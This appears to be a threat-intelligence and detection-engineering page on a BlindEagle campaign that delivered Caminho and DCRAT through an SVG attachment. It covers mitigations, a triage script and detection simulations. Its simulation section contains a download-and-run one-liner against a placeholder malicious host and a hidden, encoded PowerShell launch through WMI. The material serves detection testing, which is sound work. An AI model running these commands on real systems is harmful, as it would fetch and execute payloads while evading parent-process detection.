BlindEagle Targets Colombian Government Agency with Caminho and DCRAT

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

BlindEagle ran a spear-phishing operation targeting a Colombian government agency, delivering a weaponized SVG attachment that initiated a JavaScript-to-PowerShell execution chain. That sequence pulled down a downloader dubbed Caminho, which then fetched the DCRAT remote access trojan from a Discord-hosted URL. The final stage hollowed MSBuild.exe and applied multiple evasion methods to reduce detection.

Investigation

Zscaler ThreatLabz analyzed the infection flow and reported an SVG smuggling approach, several tiers of obfuscated JavaScript, a WMI-triggered PowerShell command, and Caminho delivery through a Discord-hosted URL. The investigation also associated the supporting infrastructure with Swedish IP addresses and a dynamic DNS provider (ydns.eu).

Mitigation

Apply tighter controls for inbound email attachments, especially SVG content, and enforce content disarm/inspection for embedded scripts (an SVG is XML and may legitimately contain script elements, which is what makes it a smuggling container that many mail filters treat as an image). Use web proxy policies to restrict access to suspicious file-hosting endpoints, including Discord file URLs used for malware delivery. Monitor for unusual PowerShell and WMI execution patterns, and enforce application allowlisting covering MSBuild.exe: it is a signed Microsoft binary, so publisher-based allow rules alone do not stop its abuse, and it should be blocked explicitly (it is on Microsoft's recommended WDAC block list) on hosts that do not build software.

Response

Trigger alerts for the malicious SVG artifact, the referenced JavaScript filename, and downloads reaching the Discord URL. Hunt for in-memory or on-disk traces of Caminho and DCRAT, evidence of MSBuild.exe process hollowing, and persistence via registry changes or scheduled tasks. Quarantine impacted endpoints and block the identified C2 domain.
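A host-triage script for the artifacts listed above, added here as an example; it is not code from the SOC Prime page or from Zscaler's report. It enumerates Run/RunOnce values, scheduled-task actions and running MSBuild.exe instances on one host. The user-writable path patterns, the script-host list and the set of "expected" MSBuild.exe parents are assumptions for a typical workstation and should be tuned per environment:

```powershell
# Added host-triage example (not from the SOC Prime page or Zscaler's report).
# Enumerates the artifacts the Response section names: Run/RunOnce values,
# scheduled-task actions, and running MSBuild.exe instances.
# ASSUMPTIONS: the path patterns, script-host names and build-tool parents below
# are typical-workstation defaults; tune them for your estate.

$userWritable = '*\AppData\*', '*\Temp\*', '*\Users\Public\*', '*\ProgramData\*'
$scriptHosts  = 'powershell|pwsh|mshta|wscript|cscript|rundll32'
$buildParents = 'devenv.exe', 'MSBuild.exe', 'dotnet.exe', 'VBCSCompiler.exe'

function Test-SuspiciousCommand([string]$Command) {
    # True when a command launches from a user-writable path or via a script host.
    foreach ($pattern in $userWritable) {
        if ($Command -like $pattern) { return $true }
    }
    return [bool]($Command -match $scriptHosts)
}

$findings = New-Object System.Collections.Generic.List[object]

# 1. Run / RunOnce values (T1547.001)
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }      # provider metadata, not a value
        if (Test-SuspiciousCommand "$($prop.Value)") {
            $findings.Add([pscustomobject]@{ Source = $key; Name = $prop.Name; Detail = $prop.Value })
        }
    }
}

# 2. Scheduled-task actions (T1053)
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $cmd = ("$($action.Execute) $($action.Arguments)").Trim()
        if ($cmd -and (Test-SuspiciousCommand $cmd)) {
            $findings.Add([pscustomobject]@{ Source = 'ScheduledTask'; Name = "$($task.TaskPath)$($task.TaskName)"; Detail = $cmd })
        }
    }
}

# 3. MSBuild.exe instances (the T1055.012 target): a hollowed MSBuild.exe usually
#    has no build-tool parent and no project file on its command line (heuristic).
foreach ($proc in Get-CimInstance Win32_Process -Filter "Name = 'MSBuild.exe'") {
    $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
    if ($buildParents -notcontains $parent.Name -or $proc.CommandLine -notmatch '\.(sln|csproj|vbproj|proj)\b') {
        $findings.Add([pscustomobject]@{ Source = 'Process'; Name = "MSBuild.exe PID $($proc.ProcessId)"; Detail = "parent=$($parent.Name) cmdline=$($proc.CommandLine)" })
    }
}

$findings | Format-Table -AutoSize -Wrap
```

Run it elevated so HKLM and other users' tasks are readable. On developer workstations the MSBuild.exe check will be noisy; there, compare the flagged command lines against the persistence findings rather than treating a lone MSBuild.exe hit as conclusive.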

"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 %% Nodes initial_access_phishing["<b>Action</b> – <b>T1566.001 Phishing Attachment</b><br/>SVG attachment in email"] class initial_access_phishing action user_exec_malicious_link["<b>Action</b> – <b>T1204.001 User Execution</b><br/>Click malicious SVG image"] class user_exec_malicious_link action user_exec_malicious_file["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Open JavaScript file"] class user_exec_malicious_file action obfuscation_svg_smuggling["<b>Technique</b> – <b>T1027.017</b><br/>SVG smuggling to hide script"] class obfuscation_svg_smuggling technique obfuscation_embedded_payloads["<b>Technique</b> – <b>T1027.009</b><br/>Base64 encoded JavaScript payloads"] class obfuscation_embedded_payloads technique command_js["<b>Technique</b> – <b>T1059.007 JavaScript</b><br/>Deobfuscation scripts"] class command_js technique command_powershell["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/>WMI Create to run PowerShell"] class command_powershell technique event_wmi_subscription["<b>Technique</b> – <b>T1546.003</b><br/>WMI event subscription execution"] class event_wmi_subscription technique obfuscation_steganography["<b>Technique</b> – <b>T1027.003</b><br/>Payload hidden in PNG image"] class obfuscation_steganography technique reflective_code_loading["<b>Technique</b> – <b>T1620</b><br/>Reflective .NET assembly loading"] class reflective_code_loading technique process_hollowing["<b>Technique</b> – <b>T1055.012</b><br/>MsBuild hollowing"] class process_hollowing technique downloader_caminho["<b>Tool</b> – <b>Name</b>: Caminho downloader<br/><b>Purpose</b>: Fetch DCRAT"] class downloader_caminho tool malware_dcrat["<b>Malware</b> – <b>Name</b>: DCRAT"] class malware_dcrat malware amsi_bypass["<b>Technique</b> – <b>T1027.005</b><br/>Patch AMSI to bypass detection"] class amsi_bypass technique 
persistence_run_key["<b>Technique</b> – <b>T1547.001</b><br/>Create Run key in registry"] class persistence_run_key technique persistence_scheduled_task["<b>Technique</b> – <b>T1053</b><br/>Create scheduled task"] class persistence_scheduled_task technique c2_discord["<b>Command & Control</b> – Discord URL used for payload distribution"] class c2_discord technique %% Connections initial_access_phishing –>|leads_to| user_exec_malicious_link user_exec_malicious_link –>|leads_to| user_exec_malicious_file user_exec_malicious_file –>|leads_to| obfuscation_svg_smuggling obfuscation_svg_smuggling –>|leads_to| obfuscation_embedded_payloads obfuscation_embedded_payloads –>|leads_to| command_js command_js –>|leads_to| command_powershell command_powershell –>|leads_to| event_wmi_subscription event_wmi_subscription –>|leads_to| obfuscation_steganography obfuscation_steganography –>|leads_to| reflective_code_loading reflective_code_loading –>|leads_to| process_hollowing process_hollowing –>|leads_to| downloader_caminho downloader_caminho –>|downloads| malware_dcrat malware_dcrat –>|performs| amsi_bypass malware_dcrat –>|establishes| persistence_run_key malware_dcrat –>|establishes| persistence_scheduled_task malware_dcrat –>|uses| c2_discord "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The threat actor (BlindEagle) uses WMI to spawn a PowerShell process that downloads the “Caminho” downloader from a remote server and executes it. Invoking the Win32_Process.Create method through wmic.exe (“process call create”) lets the attacker run PowerShell without an interactive session, and the new process is parented by the WMI provider host (WmiPrvSE.exe) rather than by wmic.exe or the phishing lure, which sidesteps parent/child heuristics that expect powershell.exe under a script host or an Office process. The command line contains the literal word “powershell”, which satisfies the detection rule’s condition. Note that wmic.exe is deprecated and no longer present by default on current Windows 11 builds; on those hosts the same method is reachable with Invoke-CimMethod -ClassName Win32_Process -MethodName Create.

    1. Stage 1 – Prepare the malicious PowerShell one‑liner (placeholder URL; in the reported campaign the payload came from a Discord-hosted URL):

      $url = "http://malicious.example.com/caminho.exe"
      $out = Join-Path $env:TEMP "caminho.exe"   # not "$env:TEMPcaminho.exe", which reads an env var named TEMPcaminho
      Invoke-WebRequest -Uri $url -OutFile $out; Start-Process -FilePath $out
    2. Stage 2 – Execute via WMI (the <base64-encoded-payload> placeholder is the base64 of Stage 1's UTF-16LE bytes, which is what -enc expects):

      $psCmd = 'powershell -nop -w hidden -enc <base64-encoded-payload>'
      wmic process call create "$psCmd"

    The powershell.exe child is created by the WMI provider host, so its Sysmon Event ID 1 carries ParentImage = WmiPrvSE.exe (not wmic.exe) and the full string above, including the literal powershell, in CommandLine; the wmic.exe process logs a second Event ID 1 whose CommandLine also embeds it. Either record satisfies the rule, but a rule that additionally expects wmic.exe as the parent of powershell.exe would miss the child.

  • Regression Test Script:

    # BlindEagle PowerShell via WMI simulation
    # ----------------------------------------------------------------------
    # 1. Define the payload (a benign Write-Host stands in for Caminho)
    $payload = 'Write-Host "Simulated Caminho execution"'
    # -EncodedCommand expects the base64 of the script's UTF-16LE (Unicode) bytes
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Build the PowerShell command line that includes the literal word "powershell"
    $psCommand = "powershell -NoProfile -EncodedCommand $encoded"
    
    # 3. Launch it through WMI (Win32_Process.Create via wmic) to generate a Sysmon Event ID 1.
    #    The child's ParentImage will be WmiPrvSE.exe, not wmic.exe. wmic.exe is deprecated and
    #    absent on current Windows 11 builds; there, use Invoke-CimMethod -ClassName Win32_Process
    #    -MethodName Create -Arguments @{ CommandLine = $psCommand } instead.
    Write-Host "Executing via WMI: wmic process call create `"$psCommand`""
    $wmicOutput = & wmic process call create $psCommand
    $wmicOutput | Write-Host
    
    # 4. Confirm the call succeeded (ReturnValue = 0) and record the spawned PID for the SIEM check
    if (-not ($wmicOutput -match 'ReturnValue = 0')) { throw "wmic process call create failed" }
    $spawnedPid = ($wmicOutput | Select-String 'ProcessId = (\d+)' | Select-Object -First 1).Matches[0].Groups[1].Value
    Write-Host "Simulation complete (child PID $spawnedPid). Verify detection in SIEM."
  • Cleanup Commands:

    # Remove any temporary files (none created in this simulation)
    # Stop any wmic or PowerShell processes left over from the test, but never the session
    # running this script ($PID); on a shared host, narrow this to the spawned PID instead
    Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -ne $PID } | Stop-Process -Force
    Write-Host "Cleanup complete."
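To confirm that the simulation produced the telemetry the rule keys on, the following added example (not code from the SOC Prime page or from Zscaler's report) spawns the same benign command through Win32_Process.Create with Invoke-CimMethod, the supported replacement for wmic.exe, and then reads back the Sysmon Event ID 1 it generated. It assumes Sysmon is installed with process-creation logging enabled and that it runs in an elevated session, which is required to read the Sysmon channel:

```powershell
# Added verification example (not from the SOC Prime page or Zscaler's report).
# ASSUMPTIONS: Sysmon is installed with Event ID 1 logging on; the session is elevated.

function Get-SysmonField {
    # Return the value of one <Data Name="..."> field from a Sysmon event record.
    param($Record, [string]$Name)
    ([xml]$Record.ToXml()).Event.EventData.Data |
        Where-Object { $_.Name -eq $Name } |
        ForEach-Object { $_.'#text' }
}

# 1. Benign stand-in for the Caminho stage (constructed for this test).
$payload = 'Write-Host "Simulated Caminho execution"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmdLine = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded"

# 2. Win32_Process.Create is the method "wmic process call create" wraps;
#    the child is started by WmiPrvSE.exe, not by this session.
$result = Invoke-CimMethod -ClassName Win32_Process -MethodName Create `
                           -Arguments @{ CommandLine = $cmdLine }
if ($result.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed, ReturnValue=$($result.ReturnValue)"
}
$childPid = $result.ProcessId
Write-Host "WMI spawned PID $childPid"

# 3. Give Sysmon a moment, then locate the process-creation event for that PID.
Start-Sleep -Seconds 3
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = (Get-Date).AddMinutes(-2)
} -ErrorAction Stop

$record = $events |
    Where-Object { (Get-SysmonField -Record $_ -Name 'ProcessId') -eq "$childPid" } |
    Select-Object -First 1
if (-not $record) { throw "No Sysmon Event ID 1 found for PID $childPid" }

# 4. Check the two fields the rule depends on: parent is the WMI provider host,
#    and the command line carries the literal "powershell".
$parentImage = Get-SysmonField -Record $record -Name 'ParentImage'
$commandLine = Get-SysmonField -Record $record -Name 'CommandLine'

$checks = [ordered]@{
    'ParentImage is WmiPrvSE.exe'     = $parentImage -like '*\WmiPrvSE.exe'
    'CommandLine contains powershell' = $commandLine -match 'powershell'
}
$checks.GetEnumerator() | ForEach-Object {
    Write-Host ("{0,-34} {1}" -f $_.Key, $(if ($_.Value) { 'PASS' } else { 'FAIL' }))
}
if ($checks.Values -contains $false) { throw "Telemetry does not match the detection rule" }
```

The wmic.exe route in the regression script yields the same child record plus a second Event ID 1 for wmic.exe itself; the CIM route yields only the child, which is the record a rule keyed on WmiPrvSE.exe as parent must match.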